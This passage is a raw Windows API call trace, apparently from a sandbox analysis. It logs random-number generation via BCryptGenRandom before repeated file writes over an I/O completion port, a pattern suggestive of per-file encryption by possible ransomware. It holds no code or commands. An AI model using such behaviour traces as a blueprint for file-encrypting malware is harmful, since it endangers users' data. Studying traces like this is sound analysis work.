[0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.671] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.671] free (_Block=0x1fa03f8) [0076.671] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.671] free (_Block=0x1fa03f8) [0076.671] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.671] free (_Block=0x1fa03f8) [0076.671] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.671] free (_Block=0x1fa03f8) [0076.671] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.671] free (_Block=0x1fa03f8) [0076.671] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.671] free (_Block=0x1fa03f8) [0076.671] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.671] free (_Block=0x1fa03f8) [0076.671] free (_Block=0x1ff1e60) [0076.671] free (_Block=0x1ff2398) [0076.671] free (_Block=0x1ff2070) [0076.671] free (_Block=0x1ff25a8) [0076.671] free (_Block=0x1fa2b08) [0076.672] free (_Block=0x1ff1930) [0076.672] free (_Block=0x1ff1a40) [0076.672] free (_Block=0x77d908) [0076.672] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.674] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.676] CloseHandle (hObject=0x16c) returned 1 [0076.676] free (_Block=0x1fb18c0) [0076.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.678] CloseHandle (hObject=0x16c) returned 1 [0076.684] free (_Block=0x1fb18c0) [0076.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.696] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.696] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0076.697] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.697] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.697] free (_Block=0x77d800) [0076.697] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.697] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.698] free (_Block=0x1ff1930) [0076.698] free (_Block=0x1ff1a40) [0076.698] free (_Block=0x77d908) [0076.698] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.701] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.702] CloseHandle (hObject=0x16c) returned 1 [0076.702] free (_Block=0x1fb18c0) [0076.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0076.714] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.714] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.714] free (_Block=0x77d800) [0076.714] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.715] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.715] free (_Block=0x1ff1930) [0076.715] free (_Block=0x1ff1a40) [0076.715] free (_Block=0x77d908) [0076.715] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.717] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.719] CloseHandle (hObject=0x16c) returned 1 [0076.719] free (_Block=0x1fb18c0) [0076.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0076.736] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.736] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.736] free (_Block=0x77d800) [0076.736] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.736] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.736] free (_Block=0x1ff1930) [0076.736] free (_Block=0x1ff1a40) [0076.736] free (_Block=0x77d908) [0076.736] WriteFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.737] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.738] WriteFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xca00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.740] CloseHandle (hObject=0x3a8) returned 1 [0076.740] free (_Block=0x1fb18c0) [0076.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.742] CloseHandle (hObject=0x3a8) returned 1 [0076.742] free (_Block=0x1fb18c0) [0076.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0076.755] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.755] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.755] free (_Block=0x77d800) [0076.755] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.755] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.756] free (_Block=0x1ff1930) [0076.756] free (_Block=0x1ff1a40) [0076.756] free (_Block=0x77d908) [0076.756] WriteFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.758] WriteFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.773] ReadFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.775] CloseHandle (hObject=0x3a8) returned 1 [0076.776] free (_Block=0x1fb18c0) [0076.776] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.787] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0076.787] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.787] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.787] free (_Block=0x77d800) [0076.787] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.787] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.787] free (_Block=0x1ff1930) [0076.787] free (_Block=0x1ff1a40) [0076.787] free (_Block=0x77d908) [0076.787] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.790] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xddc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.791] CloseHandle (hObject=0x16c) returned 1 [0076.792] free (_Block=0x1fb18c0) [0076.792] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0076.803] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.803] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.803] free (_Block=0x77d800) [0076.803] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.803] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.804] free (_Block=0x1ff1930) [0076.804] free (_Block=0x1ff1a40) [0076.804] free (_Block=0x77d908) [0076.804] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.804] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.806] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xa200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.807] CloseHandle (hObject=0x16c) returned 1 [0076.807] free (_Block=0x1fb18c0) [0076.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0076.818] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.819] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.819] free (_Block=0x77d800) [0076.819] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.819] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.819] free (_Block=0x1ff1930) [0076.819] free (_Block=0x1ff1a40) [0076.819] free (_Block=0x77d908) [0076.819] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.819] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.821] WriteFile (in: hFile=0x16c, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.840] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.914] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13400, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0076.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.941] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.941] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0076.944] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.945] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.945] free (_Block=0x77d800) [0076.945] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.945] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.945] free (_Block=0x1ff1930) [0076.945] free (_Block=0x1ff1a40) [0076.945] free (_Block=0x77d908) [0076.945] WriteFile (in: hFile=0x3a8, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0076.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.974] CloseHandle (hObject=0x3a0) returned 1 [0076.975] free (_Block=0x1ff1e60) [0076.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.003] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0077.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.008] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0077.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0077.010] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.010] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.010] free (_Block=0x77d800) [0077.010] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0077.010] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0077.010] free (_Block=0x1ff1930) [0077.010] free (_Block=0x1ff1a40) [0077.010] free (_Block=0x77d908) [0077.010] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.010] 